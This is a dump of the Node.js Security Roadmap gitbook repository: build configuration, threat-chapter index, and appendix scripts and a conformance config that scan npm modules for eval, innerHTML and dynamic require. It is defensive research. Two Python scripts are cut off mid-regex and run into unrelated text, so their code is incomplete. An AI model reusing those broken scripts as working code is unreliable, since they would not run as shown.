├── .bookignore
├── .gitignore
├── .well-known
└── security.txt
├── CONTRIBUTING.md
├── CONTRIBUTORS.md
├── LICENSE
├── Makefile
├── README.md
├── SUMMARY.md
├── app.yaml
├── appendix
├── .gitignore
├── bad-pattern-grep
│ └── experiment.py
├── dyn-load
│ └── experiment.py
├── experiments.md
├── jsconf
│ ├── conformance_proto.textproto
│ └── experiment.py
├── lazy-load
│ └── experiment.py
├── py_common
│ ├── __init__.py
│ └── npm.py
├── test-code
│ └── experiment.py
├── top100.txt
└── uses-scripts
│ └── experiment.py
├── book.json.withcomments
├── chapter-1
├── recap.md
├── threat-0DY.md
├── threat-BOF.md
├── threat-CRY.md
├── threat-DEX.md
├── threat-DOS.md
├── threat-EXF.md
├── threat-LQC.md
├── threat-MTP.md
├── threat-QUI.md
├── threat-RCE.md
├── threat-SHP.md
├── threat-UIR.md
└── threats.md
├── chapter-2
├── bounded-eval.md
├── bundling.md
├── dynamism.md
├── example
│ ├── .gitignore
│ ├── graphs
│ │ ├── filtered.dot
│ │ ├── filtered.svg
│ │ ├── full.dot
│ │ └── full.svg
│ ├── index.js
│ ├── lib
│ │ ├── dynamic.js
│ │ ├── lazy.js
│ │ ├── opt2.js
│ │ └── static.js
│ ├── make_dep_graph.sh
│ ├── package.json
│ └── test
│ │ └── test.js
├── experiments
│ └── webpack-compat
│ │ ├── .gitignore
│ │ ├── goodbye.js
│ │ ├── hello.js
│ │ ├── index.js
│ │ ├── package.json
│ │ ├── test-utils.js
│ │ ├── test.sh
│ │ ├── test
│ │ └── test.js
│ │ └── webpack.config.js
├── source-contents.md
├── synthetic-modules.md
└── what-about-eval.md
├── chapter-3
└── knowing_dependencies.md
├── chapter-4
└── close_dependencies.md
├── chapter-5
└── oversight.md
├── chapter-6
└── failing.md
├── chapter-7
├── child-processes.md
├── examples
│ ├── sh
│ │ ├── index.js
│ │ ├── package.json
│ │ └── test
│ │ │ └── test.js
│ └── sql
│ │ ├── index.js
│ │ ├── package.json
│ │ └── test
│ │ └── test.js
├── libraries.md
├── query-langs.md
└── structured-strings.md
├── cover.md
├── images
├── FileExternal.svg
├── GitHub-Mark-32px.png
├── ic_print_24dp.svg
└── npmjs-node.png
├── license.md
├── package-lock.json
├── package.json
├── styles
└── website.css
└── third_party
├── __init__.py
└── jslex
├── __init__.py
└── jslex.py
/.bookignore:
--------------------------------------------------------------------------------
1 | app.yaml
2 | Makefile
3 | book.json.withcomments
4 | appendix/**/*.py
5 | appendix/**/*.textproto
6 | chapter-2/example/**/*.js
7 | chapter-2/experiments/**/*.js
8 | chapter-7/examples/**/*.js
9 | CONTRIBUTING.md
10 | **/*.sh
11 | third_party
12 | package.json
13 | package-lock.json
14 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # See appendix/README.md for how to run experiments.
2 | appendix/jsconf/externs
3 | appendix/tools
4 | # Generated by `npm install`
5 | node_modules
6 | npm-debug.log
7 | chapter-2/example/package-lock.json
8 | # Generated by Makefile
9 | www
10 | deploy
11 | .*.tstamp
12 | #book.json # Should be ignored but breaks gitbook
13 | # Generated by `gitbook serve
14 | _book
15 | # Emacs droppings
16 | .\#*
17 | *~
18 | # Python droppings
19 | *.pyc
20 |
--------------------------------------------------------------------------------
/.well-known/security.txt:
--------------------------------------------------------------------------------
1 | Contact: mikesamuel@gmail.com
2 | Acknowledgement: https://github.com/google/node-sec-roadmap/tree/master/CONTRIBUTORS.md
3 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # How to Contribute
2 |
3 | We'd love to accept your patches and contributions to this project. There are
4 | just a few small guidelines you need to follow.
5 |
6 | ## Contributor License Agreement
7 |
8 | Contributions to this project must be accompanied by a Contributor License
9 | Agreement. You (or your employer) retain the copyright to your contribution;
10 | this simply gives us permission to use and redistribute your contributions as
11 | part of the project. Head over to to see
12 | your current agreements on file or to sign a new one.
13 |
14 | You generally only need to submit a CLA once, so if you've already
15 | submitted one (even if it was for a different project), you probably
16 | don't need to do it again.
17 |
18 | ## Code reviews
19 |
20 | All submissions, including submissions by project members, require review. We
21 | use GitHub pull requests for this purpose. Consult
22 | [GitHub Help](https://help.github.com/articles/about-pull-requests/) for more
23 | information on using pull requests.
24 |
--------------------------------------------------------------------------------
/CONTRIBUTORS.md:
--------------------------------------------------------------------------------
1 | * [Ali Ijaz Sheikh](https://github.com/ofrobots)
2 | * [Franziska Hinkelmann](https://github.com/fhinkel/)
3 | * [Jen Tong](https://github.com/mimming)
4 | * [John J. Barton](https://github.com/johnjbarton)
5 | * [Justin Beckwith](https://github.com/JustinBeckwith)
6 | * [Mark S. Miller](https://github.com/erights)
7 | * [Mike Samuel](https://github.com/mikesamuel)
8 | * [Myles Borins](https://github.com/mylesborins)
9 |
10 | Special thanks for feedback and criticism:
11 |
12 | * [Matteo Collina](https://github.com/mcollina)
13 | * [Rich Trott](https://github.com/Trott)
14 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Markdown and gitbook content is (C) Google LLC and is
2 | made available under
3 | https://creativecommons.org/licenses/by/4.0/
4 |
5 |
6 | Code is avilable under the Apache 2.0 License
7 | ---------------------------------------------
8 | Copyright 2017 Google LLC
9 |
10 | Licensed under the Apache License, Version 2.0 (the "License");
11 | you may not use this file except in compliance with the License.
12 | You may obtain a copy of the License at
13 |
14 | https://www.apache.org/licenses/LICENSE-2.0
15 |
16 | Unless required by applicable law or agreed to in writing, software
17 | distributed under the License is distributed on an "AS IS" BASIS,
18 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
19 | See the License for the specific language governing permissions and
20 | limitations under the License.
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | # This Makefile builds various versions of the Gitbook, runs
2 | # sanity checks, and sets up a deployment directory.
3 | #
4 | # See `make help`
5 |
6 | define HELP
7 | Targets
8 | =======
9 | `make book` puts HTML files under www/
10 | `make pdf` builds the PDF version
11 | `make serve_static` serve the book from http://localhost:4000/
12 | `make serve` launch the builtin gitbook debug server
13 | `make check` runs sanity checks
14 | `make deploy` builds the deployment directory and runs checks
15 |
16 | Setup
17 | =====
18 | This assumes that PATH includes
19 | https://github.com/gjtorikian/html-proofer
20 | https://calibre-ebook.com/download
21 | that the following environment variables point to reasonable values:
22 | HTML_PROOFER # path to htmlproofer executable
23 | CALIBRE_HOME # path to directory containing calibre executables
24 |
25 | Deploying
26 | =========
27 | `make deploy` builds the deploy directory.
28 | From that directory `gcloud app deploy --project node-sec-roadmap`
29 | deploys to the canonical location if you have the right
30 | privileges and have run `gcloud auth login`.
31 | endef
32 | export HELP
33 |
34 |
35 | ROOT_DIR:=$(shell dirname $(realpath $(lastword $(MAKEFILE_LIST))))
36 |
37 | # External dependency used to detect dead links
38 | ifeq ($(HTML_PROOFER),)
39 | HTML_PROOFER:=${HOME}/.gem/ruby/2.4.0/gems/html-proofer-3.8.0/bin/htmlproofer
40 | ifeq (,$(wildcard ${HTML_PROOFER}))
41 | HTML_PROOFER:=/bin/echo
42 | endif
43 | endif
44 |
45 | # External dependency used to build pdf
46 | ifeq ($(CALIBRE_HOME),)
47 | CALIBRE_HOME:=/Applications/calibre.app/Contents/console.app/Contents/MacOS/
48 | endif
49 |
50 |
51 | # Bits that gitbook depends on
52 | GITBOOK_DEPS := node_modules book.json cover.md SUMMARY.md CONTRIBUTORS.md \
53 | $(wildcard chapter-*/*.md) appendix/experiments.md \
54 | styles/website.css images/*
55 |
56 |
57 | help:
58 | @echo "$$HELP"
59 |
60 | book.json : book.json.withcomments
61 | @cat book.json.withcomments \
62 | | perl -ne 'print unless m/^[ \t]*#/' > book.json
63 |
64 | pdf : www/node-sec-roadmap.pdf
65 | www/node-sec-roadmap.pdf : $(GITBOOK_DEPS)
66 | PATH="${PATH}:./node_modules/.bin/:${CALIBRE_HOME}" \
67 | ./node_modules/.bin/gitbook pdf . www/node-sec-roadmap.pdf
68 |
69 | book : www/.book.tstamp
70 | www/.book.tstamp : $(GITBOOK_DEPS)
71 | "${ROOT_DIR}"/node_modules/.bin/gitbook build . www
72 | @touch www/.book.tstamp
73 |
74 | check : .check.tstamp
75 | .check.tstamp : deploy/.deploy.tstamp
76 | touch .check.tstamp
77 | echo Checking that we correctly capitalize npm and Nodejs
78 | echo and that all Markdown link names are defined.
79 | @! find deploy/www/ -name \*.html \
80 | | xargs egrep '\]\[|[nN][oO][dD][eE]J[sS]|\bN[Pp][Mm]\b' \
81 | | egrep -v 'x\[a\]\[b\]|this\[x\]\[|[.]jfrog[.]com/'
82 | echo Checking for dead links
83 | @if [ "${HTML_PROOFER}" = "/bin/echo" ]; then \
84 | echo "Warning: HTML_PROOFER not available"; \
85 | else \
86 | echo Running htmlproofer; \
87 | "${HTML_PROOFER}" \
88 | --alt-ignore=example/graphs/full.svg \
89 | "${ROOT_DIR}"/deploy/www/; \
90 | fi
91 | @find deploy -name node_modules \
92 | || (echo "deploy/ should not include node_modules"; false)
93 |
94 | serve : $(GITBOOK_DEPS)
95 | "${ROOT_DIR}"/node_modules/.bin/gitbook serve
96 |
97 | serve_static : book
98 | pushd www; python -m SimpleHTTPServer 4000; popd
99 |
100 | clean :
101 | rm -rf www/ deploy/ _book/ book.json .*.tstamp
102 |
103 | node_modules : package.json
104 | npm install --only=prod
105 | @touch node_modules/
106 |
107 | deploy : deploy/.deploy.tstamp check
108 | deploy/.deploy.tstamp : book pdf app.yaml
109 | rm -rf deploy/
110 | mkdir deploy/
111 | cp app.yaml deploy/
112 | cp -r www/ deploy/www/
113 | @touch deploy/.deploy.tstamp
114 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Node.js Security Roadmap
2 |
3 | The security roadmap is a [gitbook](https://toolchain.gitbook.com/)
4 | publication available at
5 | *[nodesecroadmap.fyi](https://nodesecroadmap.fyi)*.
6 |
7 | ```sh
8 | $ npm start
9 | ```
10 |
11 | will serve the book via `localhost:4000`.
12 |
13 | ```sh
14 | $ make help
15 | ```
16 |
17 | will display help information about other options.
18 |
19 | Please file errata at the
20 | [issue tracker](https://github.com/google/node-sec-roadmap/issues)
21 | or send us a pull request.
22 |
23 | If you'd like to help out, please also see our
24 | [contribution guidelines](CONTRIBUTING.md).
25 |
--------------------------------------------------------------------------------
/SUMMARY.md:
--------------------------------------------------------------------------------
1 | # Summary
2 |
3 | * [Threat Environment](chapter-1/threats.md)
4 | * [Zero Day](chapter-1/threat-0DY.md)
5 | * [Buffer Overflow](chapter-1/threat-BOF.md)
6 | * [Weak Crypto](chapter-1/threat-CRY.md)
7 | * [Poor Developer Experience](chapter-1/threat-DEX.md)
8 | * [Denial of Service](chapter-1/threat-DOS.md)
9 | * [Exfiltration of Data](chapter-1/threat-EXF.md)
10 | * [Low Quality Code](chapter-1/threat-LQC.md)
11 | * [Malicious Third-Party Code](chapter-1/threat-MTP.md)
12 | * [Query Injection](chapter-1/threat-QUI.md)
13 | * [Remote Code Execution](chapter-1/threat-RCE.md)
14 | * [Shell Injection during Production](chapter-1/threat-SHP.md)
15 | * [Unintended Require](chapter-1/threat-UIR.md)
16 | * [Recap](chapter-1/recap.md)
17 | * [Dynamism when you need it](chapter-2/dynamism.md)
18 | * [Dynamic Bundling](chapter-2/bundling.md)
19 | * [Production Source Lists](chapter-2/source-contents.md)
20 | * [What about eval?](chapter-2/what-about-eval.md)
21 | * [Synthetic Modules](chapter-2/synthetic-modules.md)
22 | * [Bounded Eval](chapter-2/bounded-eval.md)
23 | * [Knowing your dependencies](chapter-3/knowing_dependencies.md)
24 | * [Keeping your dependencies close](chapter-4/close_dependencies.md)
25 | * [Oversight](chapter-5/oversight.md)
26 | * [When all else fails](chapter-6/failing.md)
27 | * [Library support for safe coding practices](chapter-7/libraries.md)
28 | * [Query languages](chapter-7/query-langs.md)
29 | * [Child processes](chapter-7/child-processes.md)
30 | * [Structured strings](chapter-7/structured-strings.md)
31 |
32 | ----
33 |
34 | * [Appendix: Experiments](appendix/experiments.md)
35 | * [Contributors](CONTRIBUTORS.md)
36 | * [License](license.md)
37 | * [Errata](https://github.com/google/node-sec-roadmap/issues)
38 |
--------------------------------------------------------------------------------
/app.yaml:
--------------------------------------------------------------------------------
1 | # cloud.google.com/appengine/docs/standard/python/config/appref
2 | runtime: python27
3 | api_version: 1
4 | threadsafe: true
5 |
6 | handlers:
7 | - url: /
8 | static_files: www/index.html
9 | upload: www/index.html
10 | secure: always
11 | mime_type: text/html; charset=UTF-8
12 | expiration: 30m
13 |
14 | - url: /(.*[.]html)$
15 | static_files: www/\1
16 | upload: www/(.*[.]html)$
17 | secure: always
18 | mime_type: text/html; charset=UTF-8
19 | expiration: 30m
20 |
21 | - url: /(.*[.]css)$
22 | static_files: www/\1
23 | upload: www/(.*[.]css)$
24 | secure: always
25 | mime_type: text/css; charset=UTF-8
26 | expiration: 30m
27 |
28 | - url: /(.*[.]js)$
29 | static_files: www/\1
30 | upload: www/(.*[.]js)$
31 | secure: always
32 | mime_type: text/javascript; charset=UTF-8
33 | expiration: 30m
34 |
35 | - url: /(.*[.]json)$
36 | static_files: www/\1
37 | upload: www/(.*[.]json)$
38 | secure: always
39 | mime_type: application/json; charset=UTF-8
40 | expiration: 30m
41 |
42 | - url: /(.*[.]txt)$
43 | static_files: www/\1
44 | upload: www/(.*[.]txt)$
45 | secure: always
46 | mime_type: text/plain; charset=UTF-8
47 | expiration: 30m
48 |
49 | - url: /(.*[.]svg)$
50 | static_files: www/\1
51 | upload: www/(.*[.]svg)$
52 | secure: always
53 | mime_type: image/svg+xml; charset=UTF-8
54 | expiration: 30m
55 |
56 | - url: /(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
57 | static_files: www/\1
58 | upload: www/(.*[.](ico|dot|eot|otf|png|ttf|woff|woff2|pdf))$
59 | secure: always
60 | expiration: 30m
61 |
62 | skip_files:
63 | - ^(.*/)?#.*#$
64 | - ^(.*/)?.*~$
65 | - ^(.*/)?.*\.py[co]$
66 | - ^(.*/)?.*/RCS/.*$
67 | - ^(.*/)?\.(?!well-known(?:/|$)).*$
68 |
--------------------------------------------------------------------------------
/appendix/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules/**
2 | separate-modules/**
3 | **~
4 | **.pyc
5 |
--------------------------------------------------------------------------------
/appendix/bad-pattern-grep/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """
18 | Look for problematic patterns like calls to eval and assignments
19 | to innerHTML that often lead to XSS when not consistently guarded.
20 | """
21 |
22 | import py_common.npm
23 | import re
24 | import sys
25 |
26 | _LEFT_BOUNDARY = r'(?> 2],
103 | values[len(values) >> 1],
104 | values[(len(values) * 3) >> 2],
105 | )
106 | print "| `%s` | %d | %d | %s |" % (
107 | v, count, total_count, quartiles)
108 |
--------------------------------------------------------------------------------
/appendix/dyn-load/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | # Copyright 2017 Google LLC
4 | #
5 | # Licensed under the Apache License, Version 2.0 (the "License");
6 | # you may not use this file except in compliance with the License.
7 | # You may obtain a copy of the License at
8 | #
9 | # https://www.apache.org/licenses/LICENSE-2.0
10 | #
11 | # Unless required by applicable law or agreed to in writing, software
12 | # distributed under the License is distributed on an "AS IS" BASIS,
13 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | # See the License for the specific language governing permissions and
15 | # limitations under the License.
16 |
17 | """Looks for dynamic code loading patterns.
18 |
19 | Patterns to identify include
20 |
21 | * require(...) where ... is not a string literal.
22 | * eval
23 | * Function(...) where there is more than one argument or the sole
24 | argument is not a function.
25 |
26 | """
27 |
28 | import json
29 | import os.path
30 | import py_common.npm
31 | import re
32 | import shutil
33 | import sys
34 |
35 |
36 | dynamic_load_pattern = re.compile(
37 | r'(?
9 |
10 | ## Grepping for Problems {#grep-problems}
11 |
12 | JS Conformance uses sophisticated type reasoning to find
13 | problems in JavaScript code
14 | (see [JS Conformance experiment](#jsconf)).
15 | It may not find problems in code that lacks type hints
16 | or that does not parse.
17 |
18 | Grep can be used to reliably find some subset of problems that
19 | JS Conformance can identify.
20 |
21 | If grep finds more of the kinds of problems that it can find
22 | than JS Conformance, then the code cannot be effectively vetted
23 | by code quality tools like JS Conformance.
24 |
25 | | Violation | Count of Modules | Total Count | Quartiles |
26 | | --------- | ---------------- | ----------- | --------- |
27 | | `Function constructor` | 32 | 200 | 0 / 0 / 1 |
28 | | `URL property assignment` | 35 | 471 | 0 / 0 / 3 |
29 | | `eval` | 24 | 87 | 0 / 0 / 0 |
30 | | `innerHTML assignment` | 17 | 81 | 0 / 0 / 0 |
31 |
32 | ## Dynamic loads {#dynamic_load}
33 |
34 | Dynamic loading can complicate code bundling.
35 |
36 | 33 of 108 = 30.56% call `require(...)` without a literal string argument.
37 |
38 | ## JS Conformance {#jsconf}
39 |
40 | JS Conformance identifies uses of risky APIs.
41 |
42 | Some modules did not parse. This may be dues to typescript.
43 | JSCompiler doesn't deal well with mixed JavaScript and TypeScript
44 | inputs.
45 |
46 | If a module is both in the top 100 and is a dependency of another
47 | module in the top 100, then it will be multiply counted.
48 |
49 | Out of 69 modules that parsed
50 |
51 | | Violation | Count of Modules | Total Count | Quartiles |
52 | | --------- | ---------------- | ----------- | --------- |
53 | | `"arguments.callee" cannot be used in strict mode` | 2 | 3 | 0 / 0 / 0 |
54 | | `Argument list too long` | 8 | 8 | 0 / 0 / 0 |
55 | | `Illegal redeclared variable: ` | 2 | 9 | 0 / 0 / 0 |
56 | | `Parse error.` | 31 | 232 | 0 / 0 / 2 |
57 | | `This style of octal literal is not supported in strict mode.` | 4 | 11 | 0 / 0 / 0 |
58 | | `Violation: Assigning a value to a dangerous property via setAttribute is forbidden` | 1 | 4 | 0 / 0 / 0 |
59 | | `Violation: Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...` | 9 | 91 | 0 / 0 / 0 |
60 | | `Violation: eval is not allowed` | 1 | 3 | 0 / 0 / 0 |
61 | | `required "..." namespace not provided yet` | 7 | 30 | 0 / 0 / 0 |
62 | | `type syntax is only supported in ES6 typed mode: ` | 3 | 132 | 0 / 0 / 0 |
63 |
64 | ## Lazy loads {#lazy_load}
65 |
66 | Lazy loading can complicate code bundling if care is not taken.
67 |
68 | 71 of 108 = 65.74% contain a use of require inside a `{...}` block.
69 |
70 |
71 | ## Prod bundle includes test code {#test_code}
72 |
73 | Some of the top 100 modules are test code, e.g. mocha, chai.
74 | This measures which modules, when installed `--only=prod` include
75 | test patterns.
76 |
77 | 50 of 108 = 46.30% contain test code patterns
78 |
79 |
80 | ## Uses Scripts {#uses_scripts}
81 |
82 | Unless steps are taken, installation scripts run code on
83 | a developer's workstation when they have write access to
84 | local repositories. If this number is small, having
85 | humans check installation scripts before running might
86 | be feasible.
87 |
88 | 4 of 979 = 0.41% use installation scripts
89 |
90 |
91 |
92 |
93 |
94 |
95 | ## Methodology
96 |
97 | The code is [available on Github][code].
98 |
99 | ```bash
100 | $ npm --version
101 | 3.10.10
102 | ```
103 |
104 | ### Top 100 Module list
105 |
106 | I extracted `top100.txt` by browsing to the most depended-upon
107 | [package list][top100] and running the below in the dev console until
108 | I had >= 100 entries.
109 |
110 | ```js
111 | var links = document.querySelectorAll('a.name')
112 | var top100 = Object.create(null)
113 | for (var i = 0; i < links.length; ++i) {
114 | var link = links[i];
115 | var packageName = link.getAttribute('href').replace(/^.*\/package\//, '')
116 | top100[packageName] = true;
117 | }
118 | var top100Names = Object.keys(top100)
119 | top100Names.sort();
120 | top100Names
121 | ```
122 |
123 | ----
124 |
125 | We also require some tools so that we can run JSCompiler against
126 | node modules. From the root directory:
127 |
128 | ```sh
129 | mkdir tools
130 | curl https://dl.google.com/closure-compiler/compiler-latest.zip \
131 | > /tmp/closure-latest.zip
132 | pushd tools
133 | jar xf /tmp/closure-latest.zip
134 | popd
135 | pushd jsconf
136 | mkdir externs
137 | pushd externs
138 | git clone https://github.com/dcodeIO/node.js-closure-compiler-externs.git
139 | popd
140 | popd
141 | ```
142 |
143 |
144 | ### Experiments
145 |
146 | Each experiment corresponds to a directory with an executable
147 | `experiment.py` file which takes a `node_modules` directory and the top 100
148 | module list and which outputs a snippet of markup.
149 |
150 | Running
151 |
152 | ```bash
153 | cat top100.txt | xargs npm install --ignore-scripts --only=prod
154 | mkdir separate-modules
155 | cd separate-modules
156 | for pn in $(cat ../top100.txt ); do
157 | mkdir -p "$pn"
158 | pushd "$pn"
159 | npm install -g --prefix="node_modules/$pn" --ignore-scripts --only=prod "$pn"
160 | popd
161 | done
162 | ```
163 |
164 | pulls down the list of node modules. As of this writing, there are 980
165 | modules that are in the top100 list or are direct or indirect prod
166 | dependencies thereof.
167 |
168 | To run the experiments and place the outputs under `/tmp/mds/`, run
169 |
170 | ```bash
171 | mkdir -p /tmp/mds/
172 | export PYTHONPATH="$PWD:$PWD/../third_party:$PYTHONPATH"
173 | for f in *; do
174 | if [ -f "$f"/experiment.py ]; then
175 | "$f"/experiment.py node_modules separate-modules top100.txt \
176 | > "/tmp/mds/$f.md"
177 | fi
178 | done
179 | ```
180 |
181 | Concatenating those markdown snippets produces the summary above.
182 |
183 | ```bash
184 | (for f in $(echo /tmp/mds/*.md | sort); do
185 | cat "$f";
186 | done) \
187 | > /tmp/mds/summary
188 | ```
189 |
190 | [code]: https://github.com/google/node-sec-roadmap/tree/master/appendix
191 | [top100]: https://www.npmjs.com/browse/depended
192 |
--------------------------------------------------------------------------------
/appendix/jsconf/conformance_proto.textproto:
--------------------------------------------------------------------------------
1 | # Copyright 2014 The Closure Compiler Authors.
2 | #
3 | # Licensed under the Apache License, Version 2.0 (the "License");
4 | # you may not use this file except in compliance with the License.
5 | # You may obtain a copy of the License at
6 | #
7 | # http://www.apache.org/licenses/LICENSE-2.0
8 | #
9 | # Unless required by applicable law or agreed to in writing, software
10 | # distributed under the License is distributed on an "AS IS" BASIS,
11 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | # See the License for the specific language governing permissions and
13 | # limitations under the License.
14 |
15 | # This file contains example JS conformance configurations for various problems
16 | # with JavaScript. Since each project may want to opt-in to different rules, and
17 | # each project may need its own specific whitelist, the examples in this file
18 | # are meant to be copied to a project specific conformance_proto.textproto file.
19 |
20 | requirement: {
21 | type: BANNED_NAME
22 | error_message: 'eval is not allowed'
23 |
24 | value: 'eval'
25 |
26 | whitelist: 'javascript/closure/base.js'
27 | whitelist: 'javascript/closure/json/json.js'
28 | }
29 |
30 | requirement: {
31 | rule_id: 'closure:stringFunctionDefinition'
32 | type: RESTRICTED_NAME_CALL
33 |
34 | value: 'Function:function()'
35 | value: 'setTimeout:function(string, ...?)'
36 | value: 'setImmediate:function(string, ...?)'
37 | value: 'setInterval:function(string, ...?)'
38 | value: 'requestAnimationFrame:function(string, ...?)'
39 |
40 | error_message: 'Function, setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
41 | }
42 |
43 | requirement: {
44 | rule_id: 'closure:windowStringFunctionDefinition'
45 | type: RESTRICTED_METHOD_CALL
46 |
47 | value: 'Window.prototype.setTimeout:function(string, ...?)'
48 | value: 'Window.prototype.setImmediate:function(string, ...?)'
49 | value: 'Window.prototype.setInterval:function(string, ...?)'
50 | value: 'Window.prototype.requestAnimationFrame:function(string, ...?)'
51 |
52 | error_message: 'window.setTimeout, setInterval and requestAnimationFrame are not allowed with string argument. See ...'
53 | }
54 |
55 | requirement: {
56 | type: BANNED_PROPERTY
57 | error_message: 'Arguments.prototype.callee'
58 |
59 | value: 'Arguments.prototype.callee'
60 |
61 | whitelist: 'javascript/closure/base.js' # goog.base uses arguments.callee
62 | whitelist: 'javascript/closure/debug/' # legacy stack trace support, etc
63 | }
64 |
65 | requirement: {
66 | type: BANNED_PROPERTY_WRITE
67 | error_message: 'Assignment to Element.prototype.innerHTML is not allowed'
68 |
69 | value: 'Object.innerHTML'
70 |
71 | # Safe wrapper for this property.
72 | whitelist: 'javascript/closure/dom/safe.js'
73 |
74 | # Safely used in goog.string.unescapeEntitiesUsingDom_; the string assigned to
75 | # innerHTML is a single HTML entity.
76 | whitelist: 'javascript/closure/string/string.js'
77 | }
78 |
79 | requirement: {
80 | type: BANNED_PROPERTY_WRITE
81 | error_message: 'Assignment to Element.prototype.outerHTML is not allowed'
82 |
83 | value: 'Object.outerHTML'
84 |
85 | # Safe wrapper for this property.
86 | whitelist: 'javascript/closure/dom/safe.js'
87 | }
88 |
89 | requirement: {
90 | type: BANNED_PROPERTY_WRITE
91 | error_message: 'Assignment to Location.prototype.href is not allowed'
92 |
93 | value: 'Location.prototype.href'
94 |
95 | # Safe wrapper for this property.
96 | whitelist: 'javascript/closure/dom/safe.js'
97 | }
98 |
99 | requirement: {
100 | type: BANNED_PROPERTY_WRITE
101 | error_message: 'Assignment to location is not allowed'
102 |
103 | value: 'Window.prototype.location'
104 | }
105 |
106 | requirement: {
107 | type: BANNED_PROPERTY_WRITE
108 | error_message: 'Assignment to .href property or src'
109 |
110 | # Types with .href properties that do not extend from Element.
111 | # value: 'StyleSheet.prototype.href'
112 | # value: 'CSSImportRule.prototype.href'
113 |
114 | # All other types extend from Element.
115 | # value: 'Element.prototype.href'
116 | value: 'Object.href'
117 | value: 'Object.src'
118 |
119 | # Safe wrapper for this property.
120 | whitelist: 'javascript/closure/dom/safe.js'
121 | }
122 |
123 | requirement: {
124 | rule_id: 'setAttribute URL'
125 | type: BANNED_CODE_PATTERN
126 | error_message: 'Assigning a value to a dangerous property via setAttribute is forbidden'
127 | value:
128 | '/**\n'
129 | ' * @param {*} element\n'
130 | ' * @param {?} value\n'
131 | ' */\n'
132 | 'function template(element, value) {'
133 | ' element.setAttribute(\'src\', value);'
134 | '}'
135 | value:
136 | '/**\n'
137 | ' * @param {*} element\n'
138 | ' * @param {?} value\n'
139 | ' */\n'
140 | 'function template(element, value) {\n'
141 | ' element.setAttribute(\'href\', value);\n'
142 | '}'
143 | }
144 |
145 | requirement: {
146 | type: BANNED_PROPERTY_WRITE
147 | error_message: 'Use of document.domain is not allowed'
148 |
149 | value: 'Document.prototype.domain'
150 | }
151 |
--------------------------------------------------------------------------------
/appendix/jsconf/experiment.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | """
4 | Runs JSConformance on each of the top 100 modules and collates the results.
5 | """
6 |
7 | # Copyright 2017 Google LLC
8 | #
9 | # Licensed under the Apache License, Version 2.0 (the "License");
10 | # you may not use this file except in compliance with the License.
11 | # You may obtain a copy of the License at
12 | #
13 | # https://www.apache.org/licenses/LICENSE-2.0
14 | #
15 | # Unless required by applicable law or agreed to in writing, software
16 | # distributed under the License is distributed on an "AS IS" BASIS,
17 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
18 | # See the License for the specific language governing permissions and
19 | # limitations under the License.
20 |
21 | import json
22 | import os.path
23 | import py_common.npm
24 | import re
25 | import shutil
26 | import subprocess
27 | import sys
28 |
29 |
30 | _error_re = re.compile(r'(?m)^\S+: ERROR - ((?![.]\s)[^\r\n]*)')
31 | # Patterns that can be used to group error messages by glossing over
32 | # any content not in a capturing group.
33 | _simplifier_res = (
34 | re.compile(r'^(required ").*?(" namespace not provided yet)'),
35 | re.compile(r'^(type syntax is only supported in ES6 typed mode: ).*'),
36 | re.compile(r'^(Illegal redeclared variable: ).*'),
37 | re.compile(r'^(Parse error[.]).*'),
38 | )
39 |
40 |
41 | def run_jsconf(node_modules, module_name, externs):
42 | """
43 | Runs JSConformance on the given module's source files.
44 | """
45 | srcs = py_common.npm.js_srcs_almost_worst_case(
46 | node_modules, module_name,
47 | module_filter=py_common.npm.ignore_tools_that_can_run_early(module_name))
48 | if not srcs:
49 | raise Exception(module_name + ' has no srcs')
50 | args = [
51 | 'java',
52 | '-jar',
53 | os.path.join(
54 | os.path.dirname(node_modules),
55 | 'tools',
56 | 'closure-compiler-latest',
57 | 'closure-compiler.jar'),
58 | '--process_common_js_modules',
59 | '--checks-only',
60 | '--third_party=true',
61 | '--module_resolution=NODE',
62 | '--js_module_root=%s' % os.path.realpath(node_modules),
63 | '--jscomp_error=conformanceViolations',
64 | '--conformance_configs',
65 | os.path.join(
66 | os.path.dirname(node_modules),
67 | 'jsconf',
68 | 'conformance_proto.textproto'),
69 | ]
70 | for (_, js_file) in srcs:
71 | args += ['--js', os.path.realpath(js_file)]
72 | for js_file in sorted(externs):
73 | args += ['--externs', js_file]
74 | #print >>sys.stderr, len(' '.join(args))
75 | if len(' '.join(args)) >= 240000: # `getconf ARG_MAX` for Mac OSX
76 | return ['Argument list too long']
77 | process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
78 | content = process.stdout.read()
79 | retcode = process.wait()
80 | violations = []
81 | if retcode == 0:
82 | violations.append('Passed')
83 | for match in _error_re.finditer(content):
84 | violation = match.group(1)
85 | for simpler in _simplifier_res:
86 | match = simpler.match(violation)
87 | if match:
88 | violation = '...'.join(match.groups())
89 | violations.append(violation)
90 | return violations
91 |
92 | if __name__ == '__main__':
93 | (node_modules, separate_modules, top100_txt) = sys.argv[1:]
94 |
